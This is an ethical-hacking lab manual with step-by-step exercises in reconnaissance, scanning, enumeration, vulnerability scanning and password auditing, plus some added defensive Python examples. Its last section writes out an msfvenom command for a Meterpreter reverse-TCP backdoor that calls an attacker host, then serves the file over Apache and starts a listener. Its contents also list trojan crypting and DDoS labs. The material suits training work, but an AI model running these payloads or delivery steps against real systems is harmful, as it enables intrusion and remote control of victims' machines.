Ethical Hacking Lab Manual

The document outlines a series of experiments focused on cybersecurity techniques, including footprinting, network scanning, vulnerability analysis, system hacking, malware threats, and social engineering. Each experiment details specific tasks, tools, and methodologies used for gathering information, discovering hosts, performing vulnerability assessments, and executing attacks. The experiments are structured with dates and page numbers, indicating a comprehensive lab manual for practical cybersecurity training.

Uploaded by

swethav0103

CONTENTS
(Experiment No. / Contents / Page number / Date)

Experiment 1: Footprinting and Reconnaissance   Page 4   Date 20/11/2023
  1 Perform Footprinting Through Search Engines
    1.1 Gather Information using Advanced Google Hacking Techniques
    1.2 Gather Information from Video Search Engines
    1.3 Gather Information from FTP Search Engines
    1.4 Gather Information from IoT Search Engines
  2 Perform Footprinting Through Web Services
    2.1 Find the Company's Domains and Sub-domains using Netcraft
    2.2 Gather Personal Information using PeekYou Online People Search Service
    2.3 Gather an Email List using theHarvester
    2.4 Gather Information using Deep and Dark Web Searching
    2.5 Determine Target OS Through Passive Footprinting

Experiment 2: Scanning Networks   Page 11   Date 1/12/2023
  1 Perform Host Discovery
    1.1 Perform Host Discovery using Nmap
    1.2 Perform Host Discovery using Angry IP Scanner
  2 Perform Port and Service Discovery
    2.1 Perform Port and Service Discovery using MegaPing
    2.2 Perform Port and Service Discovery using NetScanTools Pro

Experiment 3: Enumeration   Page 17   Date 7/12/2023
  1 Perform NetBIOS Enumeration
    1.1 Perform NetBIOS Enumeration using Windows Command-Line Utilities
    1.2 Perform NetBIOS Enumeration using NetBIOS Enumerator
    1.3 Perform NetBIOS Enumeration using an NSE Script
  2 Perform SNMP Enumeration
    2.1 Perform SNMP Enumeration using snmp-check
    2.2 Perform SNMP Enumeration using SoftPerfect Network Scanner

Experiment 4: Vulnerability Analysis   Page 21   Date 15/12/2023
  1 Perform Vulnerability Research with Vulnerability Scoring Systems and Databases
    1.1 Perform Vulnerability Research in Common Weakness Enumeration (CWE)
    1.2 Perform Vulnerability Research in Common Vulnerabilities and Exposures (CVE)
    1.3 Perform Vulnerability Research in National Vulnerability Database (NVD)
  2 Perform Vulnerability Assessment using Various Vulnerability Assessment Tools
    2.1 Perform Vulnerability Analysis using OpenVAS
Page| 1
    2.2 Perform Vulnerability Scanning using Nessus
    2.3 Perform Vulnerability Scanning using GFI LanGuard

Experiment 5: System Hacking   Page 26   Date 21/12/2023
  1 Gain Access to the System
    1.1 Perform Active Online Attack to Crack the System's Password using Responder
    1.2 Audit System Passwords using L0phtCrack
  2 Perform Privilege Escalation to Gain Higher Privileges
    2.1 Escalate Privileges using Privilege Escalation Tools and Exploit Client-Side Vulnerabilities
    2.2 Hack a Windows Machine using Metasploit and Perform Post-Exploitation using Meterpreter

Experiment 6: Malware Threats   Page 36   Date 11/1/2024
  1 Gain Access to the Target System using Trojans
    1.1 Gain Control over a Victim Machine using the njRAT RAT Trojan
    1.2 Hide a Trojan using SwayzCryptor and Make it Undetectable to Various Anti-Virus Programs
    1.3 Create a Server using the ProRat Tool
    1.4 Create a Trojan Server using Theef RAT Trojan
  2 Infect the Target System using a Virus
    2.1 Create a Virus using the JPS Virus Maker Tool and Infect the Target System
  3 Perform Static Malware Analysis
    3.1 Perform Online Malware Scanning using VirusTotal
    3.2 Perform a Strings Search using BinText

Experiment 7: Sniffing   Page 43   Date 24/1/2024
  1 Perform Active Sniffing
    1.1 Perform MAC Flooding using macof
    1.2 Perform a DHCP Starvation Attack using Yersinia
    1.3 Perform ARP Poisoning using arpspoof
  2 Perform Network Sniffing using Various Sniffing Tools
    2.1 Perform Password Sniffing using Wireshark
    2.2 Analyze a Network using the Capsa Network Analyzer
    2.3 Analyze a Network using the Omnipeek Network Protocol Analyzer

Experiment 8: Social Engineering   Page 52   Date 29/1/2024
  1 Perform Social Engineering using Various Techniques
    1.1 Sniff Users' Credentials using the Social-Engineer Toolkit (SET)
    1.2 Perform Phishing using ShellPhish
  2 Detect a Phishing Attack
    2.1 Detect Phishing using Netcraft
    2.2 Detect Phishing using PhishTank
  3 Audit Organization's Security for Phishing Attacks
    3.1 Audit Organization's Security for Phishing Attacks using OhPhish
Experiment 9   Page 55   Date 30/1/2024
  1 Perform DoS and DDoS Attacks using Various Techniques
    1.1 Perform a DoS Attack (SYN Flooding) on a Target Host using Metasploit
    1.2 Perform a DoS Attack on a Target Host using hping3
    1.3 Perform a DDoS Attack using HOIC
    1.4 Perform a DDoS Attack using LOIC
  2 Detect and Protect Against DoS and DDoS Attacks
    2.1 Detect and Protect against DDoS Attack using Anti DDoS Guardian

Experiment 10: Session Hijacking   Page 68   Date 22/1/2024
  1 Perform Session Hijacking
    1.1 Hijack a Session using Zed Attack Proxy (ZAP)
    1.2 Intercept HTTP Traffic using bettercap
  2 Detect Session Hijacking
    2.1 Detect Session Hijacking using Wireshark

Experiment 11: Evading IDS, Firewalls, and Honeypots

Experiment 12: Hacking Web Servers

Faculty: Dr. Shyam R.

(Signature)
Experiment 1: Footprinting and Reconnaissance
1 Perform Footprinting Through Search Engines

Task 1: Gather Information using Advanced Google Hacking Techniques

1. By default, the Windows 10 machine is selected; click Ctrl+Alt+Delete.

2. By default, the Admin user profile is selected. Click Pa$$w0rd to paste the password in the
Password field and press Enter to log in.

Alternatively, you can also click Pa$$w0rd under the Windows 10 machine thumbnail in
the Resources pane, or click the Type Text | Type Password button under the Commands
(thunder icon) menu.
If the Welcome to Windows wizard appears, click Continue, and in the Sign in with
Microsoft wizard, click Cancel.
If the Networks screen appears, click Yes to allow your PC to be discoverable by other PCs and
devices on the network.

3. Launch any browser; in this lab we are using Mozilla Firefox. Place your mouse cursor in the
address bar of the browser, click https://www.google.com and press Enter.
o If the Default Browser pop-up window appears, uncheck the Always perform this
check when starting Firefox checkbox and click the Not now button.
o If a New in Firefox: Content Blocking pop-up window appears, follow the steps and
click Got it to finish viewing the information.

4. Once the Google search engine appears, you should see a search bar.

If any pop-up window appears at the top-right corner, click No, thanks.

5. Type intitle:login site:eccouncil.org and press Enter. This search command
uses the intitle and site Google advanced operators, which restrict results to pages on
the eccouncil.org website whose titles contain "login", i.e. its login pages. An example is
shown in the screenshot below.

Here, this advanced Google search operator can help attackers and pen testers extract the
login pages of the target organization's website. Attackers can subject login pages to
various attacks such as credential brute-forcing, injection attacks and other web application
attacks. Similarly, assessing the login pages against these attacks is crucial for penetration
testing.

6. Now, click the back icon at the top-left corner of the browser window to navigate
back to https://www.google.com.

7. In the search bar, type the command EC-Council filetype:pdf and press Enter to search
your results based on the file extension.

Here, the file type pdf is searched for the target organization EC-Council. The result might
differ when you perform this task.
The PDF and other documents from a target website may provide sensitive information
about the target's products and services. They may help attackers determine an attack
vector to exploit the target. Pen testers also look for these files to assess the target
organization's security posture.

8. Now, click on any link from the results (here, first link) to view the pdf file.

9. The page appears displaying the PDF file, as shown in the screenshot.

10. Apart from the aforementioned advanced Google operators, you can also use the
following to perform an advanced search to gather more information about the target
organization from publicly available sources.
o cache: This operator allows you to view the cached version of a web page.
[cache:www.eccouncil.org] returns the cached version of the website
www.eccouncil.org.
o allinurl: This operator restricts results to pages containing all the query terms
specified in the URL. [allinurl: EC-Council career] returns only pages
containing the words "EC-Council" and "career" in the URL.
o inurl: This operator restricts the results to pages containing the word specified in the
URL. [inurl: copy site:www.eccouncil.org] returns only pages on the EC-Council
site in which the URL has the word "copy".
o allintitle: This operator restricts results to pages containing all the query terms
specified in the title. [allintitle: detect malware] returns only pages
containing the words "detect" and "malware" in the title.
o inanchor: This operator restricts results to pages containing the query terms
specified in the anchor text on links to the page. [Anti-virus inanchor:Norton]
returns only pages whose inbound link anchor text contains the word
"Norton" and whose content contains the word "Anti-virus".
o allinanchor: This operator restricts results to pages containing all query terms
specified in the anchor text on links to the page. [allinanchor: best cloud service
provider] returns only pages in which the anchor text on links to the pages
contains the words "best," "cloud," "service," and "provider".
o link: This operator searches websites or pages that contain links to the specified
website or page. [link:www.eccouncil.org] finds pages that point to EC-Council's
home page.
o related: This operator displays websites that are similar or related to the URL
specified. [related:www.eccouncil.org] provides a Google search engine
results page with websites similar to eccouncil.org.

o info: This operator finds information for the specified web page.
[info:eccouncil.org] provides information about the www.eccouncil.org
home page.
o location: This operator finds information for a specific location. [location: EC-Council]
gives you results based around the term EC-Council.
11. This concludes the demonstration of gathering information using advanced Google
hacking techniques. You can conduct a series of queries on your own by using these
advanced Google operators and gather the relevant information about the target
organization.
12. Close all open windows and document all the acquired information.
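A defender-side complement to the operators above, added here and not part of the manual: given an inventory of your own site's pages (constructed below), it evaluates which ones a given advanced query would surface, so exposed login pages and documents can be found before anyone else searches for them. Only operators that can be evaluated offline are implemented (site:, inurl:, allinurl:, intitle:, allintitle:, filetype: and plain terms); cache:, link:, related:, info: and inanchor: need Google's index and are rejected.

```python
"""Offline check of which pages in your own site inventory an advanced
Google query would surface. Added example, not part of the lab manual;
the inventory below is constructed, not real crawl data."""
import re
from urllib.parse import urlparse

# Constructed (url, title) inventory standing in for a crawl of the
# organization's own public web presence.
PAGES = [
    ("https://www.example-corp.test/admin/login", "Admin Login - Example Corp"),
    ("https://www.example-corp.test/careers", "Careers at Example Corp"),
    ("https://www.example-corp.test/docs/report-2023.pdf", "Annual Report 2023"),
    ("https://www.example-corp.test/files/copy-of-contract.pdf", "Contract (copy)"),
    ("https://blog.example-corp.test/login", "Login | Example Blog"),
    ("https://other.test/login", "Login"),
]

# operator:value (optional whitespace after the colon, as the manual writes
# it), or a quoted phrase, or a bare term
TOKEN_RE = re.compile(r'(?:(\w+):\s*)?("[^"]*"|\S+)')


def parse_query(query):
    """Return [(operator or None, value)]. The allin* operators take the whole
    remainder of the query, so their value is a list of words."""
    parts = []
    for m in TOKEN_RE.finditer(query):
        op = m.group(1).lower() if m.group(1) else None
        if op and op.startswith("allin"):
            rest = query[m.start(2):].replace('"', "").lower().split()
            parts.append((op, rest))
            break
        parts.append((op, m.group(2).strip('"').lower()))
    return parts


def _matches(url, title, parts):
    host, path = urlparse(url).netloc.lower(), urlparse(url).path.lower()
    url_l, title_l = url.lower(), title.lower()
    for op, val in parts:
        if op is None:
            ok = val in title_l or val in url_l   # no page body text offline
        elif op == "site":
            ok = host == val or host.endswith("." + val)
        elif op == "filetype":
            ok = path.endswith("." + val)
        elif op == "inurl":
            ok = val in url_l
        elif op == "allinurl":
            ok = all(w in url_l for w in val)
        elif op == "intitle":
            ok = val in title_l
        elif op == "allintitle":
            ok = all(w in title_l for w in val)
        else:  # cache:, link:, related:, info:, inanchor: need live index data
            raise ValueError(f"operator cannot be evaluated offline: {op}:")
        if not ok:
            return False
    return True


def find_exposed(query, pages=PAGES):
    """URLs from the inventory the query would match; review each hit and
    decide whether that page should be indexed at all."""
    parts = parse_query(query)
    return [url for url, title in pages if _matches(url, title, parts)]
```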

2 Perform Footprinting Through Web Services

Task 3: Gather an Email List using theHarvester

1. To launch Parrot Security machine, click Parrot Security.

2. In the login page, the attacker username will be selected by default. Enter password
as toor in the Password field and press Enter to log in to the machine.

If a Parrot Updater pop-up appears at the top-right corner of Desktop, ignore and close it.

If a Question pop-up window appears asking you to update the machine, click No to close
the window.

3. Click the MATE Terminal icon at the top of the Desktop window to open a Terminal
window.

4. A Parrot Terminal window appears. In the terminal window, type sudo su and
press Enter to run the programs as a root user.

5. In the [sudo] password for attacker field, type toor as a password and press Enter.

The password that you type will not be visible.

6. Now, type cd and press Enter to jump to the root directory.

7. In the terminal window, type theHarvester -d microsoft.com -l 200 -b baidu and
press Enter.

In this command, -d specifies the domain or company name to search, -l specifies the
number of results to be retrieved, and -b specifies the data source.

8. theHarvester starts extracting the details and displays them on the screen. You can see
the email IDs related to the target company and target company hosts obtained from the
Baidu source, as shown in the screenshot.

9. This concludes the demonstration of gathering an email list using theHarvester.

10. Close all open windows and document all the acquired information.

Experiment 2: Scanning Networks
1) Perform Host Discovery

Task 1: Perform Host Discovery using Nmap

1. Navigate to the Desktop and double-click Nmap - Zenmap GUI shortcut.


2. The Nmap - Zenmap GUI appears; in the Command field, type the command nmap -sn -PR
[Target IP Address] (here, the target IP address is 10.10.10.16) and click Scan.

-sn: disables port scan and -PR: performs ARP ping scan.

3. The scan results appear, indicating that the target Host is up, as shown in the
screenshot.

In this lab, we are targeting the Windows Server 2016 (10.10.10.16) machine.
The ARP ping scan sends an ARP request to the target host; an ARP response means that the host
is active.

4. In the Command field, type nmap -sn -PU [Target IP Address], (here, the target IP
address is 10.10.10.16) and click Scan. The scan results appear, indicating the target Host is
up, as shown in the screenshot.

-PU: performs the UDP ping scan.


The UDP ping scan sends UDP packets to the target host; a UDP response means that the
host is active. If the target host is offline or unreachable, various error messages such as
“host/network unreachable” or “TTL exceeded” could be returned.

5. Now, we will perform the ICMP ECHO ping scan. In the Command field, type nmap -sn
-PE [Target IP Address], (here, the target IP address is 10.10.10.16) and click Scan. The
scan results appear, indicating that the target Host is up, as shown in the screenshot.

-PE: performs the ICMP ECHO ping scan.


The ICMP ECHO ping scan involves sending ICMP ECHO requests to a host. If the target host
is alive, it will return an ICMP ECHO reply. This scan is useful for locating active devices or
determining if the ICMP is passing through a firewall.

6. Now, we will perform an ICMP ECHO ping sweep to discover live hosts from a range of
target IP addresses. In the Command field, type nmap -sn -PE [Target Range of IP
Addresses] (here, the target range of IP addresses is 10.10.10.11-20) and click Scan. The
scan results appear, indicating the target Host is up, as shown in the screenshot.

7. Apart from the aforementioned network scanning techniques, you can also use the
following scanning techniques to perform a host discovery on a target network.
o ICMP Timestamp and Address Mask Ping Scan: These techniques are alternatives
for the traditional ICMP ECHO ping scan, which are used to determine whether the
target host is live specifically when administrators block the ICMP ECHO pings.

Example –

ICMP timestamp ping scan

# nmap -sn -PP [target IP address]

ICMP address mask ping scan

# nmap -sn -PM [target IP address]

o TCP SYN Ping Scan: This technique sends empty TCP SYN packets to the target
host; an ACK response means that the host is active.

# nmap -sn -PS [target IP address]

o TCP ACK Ping Scan: This technique sends empty TCP ACK packets to the target
host; an RST response means that the host is active.

# nmap -sn -PA [target IP address]

o IP Protocol Ping Scan: This technique sends probe packets of different IP
protocols to the target host; any response to any probe indicates that the host is
active.

# nmap -sn -PO [target IP address]

8. This concludes the demonstration of discovering the target host(s) in the target network
using various host discovery techniques.
9. Close all open windows and document all the acquired information.
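Seen from the other side, each of the probes above leaves a characteristic pattern in a connection log. The following detection logic is an added example, not from the manual: it classifies constructed log records by probe type (named after the nmap switch from the task), alerts on any source that touches many distinct hosts inside a short window, and separately flags ICMP timestamp and address-mask requests. The log format and the thresholds are assumptions.

```python
"""Detect host-discovery sweeps (ARP, ICMP echo/timestamp/address-mask,
TCP SYN/ACK and UDP pings) in a connection log. Added example, not part of
the manual; the log lines are constructed to mimic a sweep of
10.10.10.11-20 launched from 10.10.10.13, plus one ordinary connection."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records: "<ISO time> <src> <dst> <proto> <detail>", where
# detail is the ICMP type, the TCP flags, the UDP port or the ARP opcode.
LOG = """\
2023-12-01T09:59:00 10.10.10.13 10.10.10.16 arp request
2023-12-01T10:00:00 10.10.10.13 10.10.10.11 icmp 8
2023-12-01T10:00:01 10.10.10.13 10.10.10.12 icmp 8
2023-12-01T10:00:02 10.10.10.13 10.10.10.14 icmp 8
2023-12-01T10:00:03 10.10.10.13 10.10.10.15 icmp 8
2023-12-01T10:00:04 10.10.10.13 10.10.10.16 icmp 8
2023-12-01T10:00:05 10.10.10.13 10.10.10.17 icmp 8
2023-12-01T10:00:06 10.10.10.13 10.10.10.18 icmp 8
2023-12-01T10:00:07 10.10.10.13 10.10.10.19 icmp 8
2023-12-01T10:00:08 10.10.10.13 10.10.10.20 icmp 8
2023-12-01T10:05:00 10.10.10.13 10.10.10.16 icmp 13
2023-12-01T10:05:01 10.10.10.13 10.10.10.16 icmp 17
2023-12-01T10:06:00 10.10.10.13 10.10.10.16 tcp S
2023-12-01T10:06:01 10.10.10.13 10.10.10.16 tcp A
2023-12-01T10:06:02 10.10.10.13 10.10.10.16 udp 40125
2023-12-01T10:30:00 10.10.10.10 10.10.10.16 tcp S
2023-12-01T10:30:00 10.10.10.10 10.10.10.16 tcp PA
"""

# (proto, detail) -> probe type, named after the nmap switch from the task
PROBE_TYPES = {
    ("arp", "request"): "ARP ping (-PR)",
    ("icmp", "8"): "ICMP echo (-PE)",
    ("icmp", "13"): "ICMP timestamp (-PP)",
    ("icmp", "17"): "ICMP address mask (-PM)",
    ("tcp", "S"): "TCP SYN ping (-PS)",
    ("tcp", "A"): "TCP ACK ping (-PA)",
}


def parse_log(text):
    """Keep only records that look like discovery probes. A bare SYN is kept
    because a real connection and a -PS probe start the same way; the sweep
    logic below separates them by how many hosts are touched."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, proto, detail = line.split()
        probe = "UDP ping (-PU)" if proto == "udp" else PROBE_TYPES.get((proto, detail))
        if probe:
            events.append((datetime.fromisoformat(ts), src, dst, probe))
    return events


def detect_sweeps(events, min_hosts=5, window=timedelta(seconds=60)):
    """One alert per source that probed at least min_hosts distinct hosts
    within any window-long span (sliding window over time-sorted events)."""
    by_src = defaultdict(list)
    for ts, src, dst, probe in events:
        by_src[src].append((ts, dst, probe))
    alerts = []
    for src, evs in sorted(by_src.items()):
        evs.sort()
        best, start = 0, 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            best = max(best, len({d for _, d, _ in evs[start:end + 1]}))
        if best >= min_hosts:
            alerts.append({"src": src, "hosts": best,
                           "probes": sorted({p for _, _, p in evs})})
    return alerts


def rare_probes(events):
    """ICMP timestamp and address-mask requests are uncommon in normal traffic
    and are the manual's fallback when echo is blocked, so flag each one."""
    return [(ts.isoformat(), src, dst, probe) for ts, src, dst, probe in events
            if probe in ("ICMP timestamp (-PP)", "ICMP address mask (-PM)")]
```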

2) Perform Port and Service Discovery
Task 2: Perform Port and Service Discovery using NetScanTools Pro

1. The Reminder window appears; if you are using a demo version of NetScanTools Pro,
click the Start the DEMO button.

2. A DEMO Version pop-up appears; click the Start NetScanTools Pro Demo… button.

3. The NetScanTools Pro main window appears, as shown in the screenshot.

4. In the left-hand pane, under the Manual Tools (all) section, scroll down and click
the Ping Scanner option, as shown in the screenshot.
5. A dialog box opens explaining the Ping Scanner tool; click OK.

6. Ensure that Use Default System DNS is selected. Enter the range of IP addresses into
the Start IP and End IP fields (here, 10.10.10.5 - 10.10.10.20); then, click Start.

7. A Ping Scanner notice pop-up appears; click I Accept.


8. After the completion of the scan, a scan result appears in the web browser (here, Google
Chrome).

9. Close the browser and switch to the NetScanTools Pro window.


10. Now, click the Port Scanner option from the left-hand pane under the Manual Tools
(all) section.

If a dialog box appears explaining the Port Scanner tool, click OK.

11. In the Target Hostname or IP Address field, enter the IP address of the target
(here, 10.10.10.16). Ensure that TCP Full Connect is selected, and then click the Scan
Range of Ports button.

12. A Port Scanner notice pop-up appears; click I Accept.
13. A result appears displaying the active ports and their descriptions, as shown in the
screenshot.

By performing the above scans, you will be able to obtain a list of active machines in the
network, their respective IP addresses and hostnames, and a list of all the open ports and
services that will allow you to choose a target host in order to enter into its network and
perform malicious activities such as ARP poisoning, sniffing, etc.

14. This concludes the demonstration of discovering open ports and services running on the
target IP address using NetScanTools Pro.

Experiment 3: Enumeration
1) Perform NetBIOS Enumeration

Task 1: Perform NetBIOS Enumeration using Windows Command-Line Utilities

1. Open a Command Prompt window.

2. Type nbtstat -a [IP address of the remote machine] (in this example, the target IP
address is 10.10.10.10) and press Enter.

In this command, -a displays the NetBIOS name table of a remote computer.

3. The result appears, displaying the NetBIOS name table of a remote computer (in this
case, the WINDOWS10 machine), as shown in the screenshot.

4. In the same Command Prompt window, type nbtstat -c and press Enter.

In this command, -c lists the contents of the NetBIOS name cache of the remote computer.

5. The result appears, displaying the contents of the NetBIOS name cache, the table of
NetBIOS names, and their resolved IP addresses.

It is possible to extract this information without creating a null session (an unauthenticated
session).

6. Now, type net use and press Enter. The output displays information about the target
such as connection status, shared folder/drive and network information, as shown in the
screenshot.

7. This concludes the demonstration of performing NetBIOS enumeration using Windows
command-line utilities such as nbtstat and net use.

Close all open windows and document all the acquired information.

2) Perform SNMP Enumeration
Perform SNMP Enumeration using snmp-check
1. Enter the following command in the terminal: nmap -sU -p 161 <target IP address>

2. Port 161 appears as open/filtered and is used by the SNMP service.
3. Now, to obtain information about the target system, type the following
command and press Enter: snmp-check <target IP address>
4. The snmp-check command enumerates the target machine and lists
information such as system information, user accounts, network information,
network IP, and listening ports.

5. Scroll down to view detailed information regarding the target network under
the following sections: networking IP, routing information and listening ports.

Experiment 4: Vulnerability Analysis
1) Perform Vulnerability Research in Common Vulnerabilities and Exposures (CVE):

1. In the Windows 10 machine, launch any browser (here, Mozilla Firefox). Place your mouse
cursor in the address bar of the browser, click https://cve.mitre.org/ and press Enter.
2. The CVE website appears. In the right pane, under the Newest CVE Entries section, recently
discovered vulnerabilities are displayed.
The results might differ in your lab environment.

3. You can copy the name of any vulnerability under the Newest CVE Entries section and
search on CVE to view detailed information on it. (here, we are selecting the
vulnerability CVE-2020-13910)
4. Now, click on the Search CVE List tab. Under Search CVE List section, type the
vulnerability name (here, CVE-2020-4051) in the search bar, and click Submit.
5. Search Results page appears, displaying the information regarding the searched
vulnerability. You can click the vulnerability link to view further detailed information
regarding the vulnerability.

6. Similarly, in the Search CVE List section, you can search for a service-related
vulnerability by typing the service name (here, SMB) and clicking Submit.
7. The Search Results page appears, displaying a list of vulnerabilities in the target service
(SMB) along with their descriptions, as shown in the screenshot.
8. Further, you can click on the CVE-ID of any vulnerability to view its detailed information.
Here, we will click on the first CVE-ID link.
9. Detailed information regarding the vulnerability is displayed such as
its Description, References, and Date Entry Created. Further, you can click on links under
the References section to view more information on the vulnerability.

10. Likewise, you can search for other target services for the underlying vulnerabilities in
the Search CVE List section.
11. This concludes the demonstration of checking vulnerabilities in the Common
Vulnerabilities and Exposures (CVE).
12. Close all open windows and document all the acquired information.

4.2) Perform Vulnerability Analysis using OpenVAS
1. Click on Parrot Security to switch to the Parrot Security machine.
2. In the login page, the attacker username will be selected by default. Enter password
as toor in the Password field and press Enter to log in to the machine.
3. Click Applications at the top of the Desktop window and navigate to Pentesting --
> Vulnerability Analysis --> Openvas - Greenbone --> Start to launch OpenVAS tool.
4. A terminal window appears, in the [sudo] password for attacker field, type toor as a
password and press Enter. OpenVAS initializes.
5. After the tool initializes, click Firefox icon from the top-section of the Desktop.
6. The Firefox browser appears; in the address bar, type https://127.0.0.1:9392 and
press Enter.
7. OpenVAS login page appears, log in
with Username and Password as admin and password and click the Login button.

8. OpenVAS Dashboards appears, as shown in the screenshot.
9. Navigate to Scans --> Tasks from the Menu bar.
10. Hover over wand icon and click the Task Wizard option.
11. The Task Wizard window appears; enter the target IP address in the IP address or
hostname field (here, the target system is Windows Server 2016 [10.10.10.16]) and click
the Start Scan button.
12. The task appears under the Tasks section; OpenVAS starts scanning the target IP
address.
13. Wait for the Status to change from Requested to Done. Once it is completed, click
the Done button under the Status column to view the vulnerabilities found in the target
system.
If you are logged out of the session then login again using credentials admin/password.

14. Report: Information appears, click Results tab to view the discovered vulnerabilities
along with their severity and port numbers on which they are running.
15. Click on any vulnerability under the Vulnerability column (here, Apache HTTP Server
2.4.20 - 2.4.39 Multiple Vulnerabilities (Windows)) to view its detailed information.
16. Detailed information regarding selected vulnerability appears, as shown in the
screenshot.

17. Similarly, you can click other discovered vulnerabilities under
the Report: Results section to view detailed information regarding the vulnerabilities in the
target system.

18. Next, go through the findings, including all high or critical vulnerabilities. Manually use
your skills to verify the vulnerability. The challenge with vulnerability scanners is that they are
quite limited; they work well for an internal or white box test only if the credentials are
known. We will explore that now: return to your OpenVAS tool, and set up for the same scan
again; but this time, turn your firewall ON in the Windows Server 2016 machine.
19. Now, we will enable Windows Firewall in the target system and scan it for
vulnerabilities.
20. Click on Windows Server 2016 to switch to the Windows Server 2016 machine and
click Ctrl+Alt+Delete to activate it, by default, Administrator user profile is selected,
click Pa$$w0rd to paste the password in the Password field and press Enter to login.
21. Navigate to Control Panel --> System and Security --> Windows Firewall --> Turn
Windows Firewall on or off, enable Windows Firewall, and click OK.


22. Click on Parrot Security to switch to the Parrot Security machine and perform Steps 9-11
to create another task for scanning the target system.
23. A newly created task appears under the Tasks section and starts scanning the target
system for vulnerabilities.
24. After the completion of the scan, click the Done button under the Status column.
25. Report: Information appears, click Results tab to view the discovered vulnerabilities
along with their severity and port numbers on which they are running.

26. The scan results for the target machine before and after the Windows Firewall was
enabled are the same, thereby indicating that the target system is vulnerable to attack even
if the Firewall is enabled.
27. This concludes the demonstration of performing vulnerability analysis using OpenVAS.
28. Close all open windows and document all the acquired information.
29. Click on Windows Server 2016 to switch to the Windows Server 2016 machine and
click Ctrl+Alt+Delete to activate it, by default, Administrator user profile is selected,
click Pa$$w0rd to paste the password in the Password field and press Enter to login.

30. Navigate to Control Panel --> System and Security --> Windows Firewall --> Turn
Windows Firewall on or off, disable Windows Firewall, and click OK.

Experiment – 5
1) Audit System Passwords using L0phtCrack
1. Obtain Password Hashes:

- L0phtCrack requires password hashes to initiate the cracking process.

2. Remote Access for Hash Retrieval:

- Network administrators can use L0phtCrack to remotely access computers on the network
and retrieve password hashes.

3. Manual or Scheduled Audits:

- L0phtCrack audits can be initiated either manually or scheduled at predefined intervals.

4. Grouped Hash Attacks:

- Once obtained, password hashes are grouped and subjected to various attacks.

5. Dictionary Attack:

- L0phtCrack employs a dictionary attack to crack passwords using a predefined set of words.

6. Hybrid Attack:

- The software utilizes a hybrid attack combining different techniques to crack passwords.

7. Rainbow Tables:

- A pre-computed attack using rainbow tables is employed in the cracking process.

8. Brute-Force Attack:

- After confirming the uniqueness of username and password, L0phtCrack uses a brute-force
attack to crack passwords.
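To see why the dictionary and rainbow-table steps listed above succeed quickly against the hash stores an auditing tool retrieves, and what blunts them, here is an added example (not L0phtCrack's code): the same passwords stored as an unsalted fast hash and as a salted, iterated hash, audited both ways. SHA-256 stands in for any unsalted fast hash, a dict stands in for a rainbow table, and the wordlist, salts and "stolen" hashes are all constructed.

```python
"""Unsalted fast hash vs salted iterated hash under a dictionary audit.
Added example for the L0phtCrack section, not the tool's code."""
import hashlib
import hmac

WORDLIST = ["password", "Pa$$w0rd", "letmein", "summer2023", "admin"]
ROUNDS = 100_000  # use a current recommended iteration count in production


def fast_hash(pw):
    """Unsalted single-round hash: the shape a precomputed table breaks."""
    return hashlib.sha256(pw.encode()).hexdigest()


def build_table(words):
    """Precompute hash -> plaintext once; reusable against every victim store."""
    return {fast_hash(w): w for w in words}


def audit_unsalted(stolen_hashes, table):
    """Pure lookups: no hashing at all at audit time."""
    return {h: table[h] for h in stolen_hashes if h in table}


def slow_hash(pw, salt):
    """Salted and iterated (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, ROUNDS)


def audit_salted(records, words):
    """Dictionary audit of (user, salt, stored) records. Each guess must be
    re-hashed per user with that user's salt, so nothing is precomputable.
    Returns (cracked users, number of ROUNDS-long hash computations spent)."""
    cracked, work = {}, 0
    for user, salt, stored in records:
        for w in words:
            work += 1
            if hmac.compare_digest(slow_hash(w, salt), stored):
                cracked[user] = w
                break
    return cracked, work


# Constructed stores: the same two passwords, stored both ways.
UNSALTED_STORE = [fast_hash("letmein"), fast_hash("correct horse battery")]
SALTED_STORE = [
    ("alice", b"constructed-salt-0001", slow_hash("letmein", b"constructed-salt-0001")),
    ("bob", b"constructed-salt-0002", slow_hash("correct horse battery", b"constructed-salt-0002")),
]


def compare():
    """Run both audits and report what each recovers and what it cost."""
    table = build_table(WORDLIST)
    weak = audit_unsalted(UNSALTED_STORE, table)
    strong, work = audit_salted(SALTED_STORE, WORDLIST)
    return {"unsalted_cracked": list(weak.values()),
            "salted_cracked": strong,
            "salted_work": work,
            # the salted digest never appears in the precomputed table
            "salted_in_table": SALTED_STORE[0][2].hex() in table}
```

The weak password falls either way, but only the unsalted store is cracked with zero hashing at audit time; the salted store costs one full PBKDF2 run per guess per user, and a precomputed table helps with none of it.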

5.2) Hack a Windows Machine using Metasploit and Perform Post-Exploitation using Meterpreter

1. Create a text file named secret.txt; write something in this file and save it in the
location C:\Users\Admin\Downloads.
In this lab, the secret.txt file contains the text “My credit card account number is
123456789.”

2. Click Parrot Security to switch to the Parrot Security machine and launch
a Terminal window.
3. A Parrot Terminal window appears. In the terminal window, type sudo su and
press Enter to run the programs as a root user.
4. In the [sudo] password for attacker field, type toor as a password and press Enter.
The password that you type will not be visible.

5. Now, type cd and press Enter to jump to the root directory.


6. Type the command msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.13 -f exe > Desktop/Backdoor.exe and press Enter.
8. Now, you need to share Backdoor.exe with the target machine (in this lab, Windows
10).
9. In the previous lab, we created a directory or shared folder (share) at the location
(/var/www/html) and with the required access permission. We will use the same directory
or shared folder (share) to share Backdoor.exe with the victim machine.
10. Type cp /root/Desktop/Backdoor.exe /var/www/html/share/ and press Enter to
copy the file to the share folder.
11. To share the file, you need to start the Apache server. Type the command service
apache2 start and press Enter.

12. Now, type the command msfconsole and press Enter to launch Metasploit.
13. Type use exploit/multi/handler and press Enter to handle exploits launched outside of
the framework.
14. Now, issue the following commands in msfconsole:
o Type set payload windows/meterpreter/reverse_tcp and press Enter
o Type set LHOST 10.10.10.13 and press Enter
o Type show options and press Enter; this lets you know the listening port
15. To start the handler, type exploit -j -z and press Enter.
16. Click Windows 10 to switch to the Windows 10 machine.
17. Open any web browser (here, Mozilla Firefox). Place your mouse cursor in the address bar,
click http://10.10.10.13/share and press Enter. As soon as you press Enter, the browser displays
the shared folder contents, as shown in the screenshot.
18. Click Backdoor.exe to download the file.

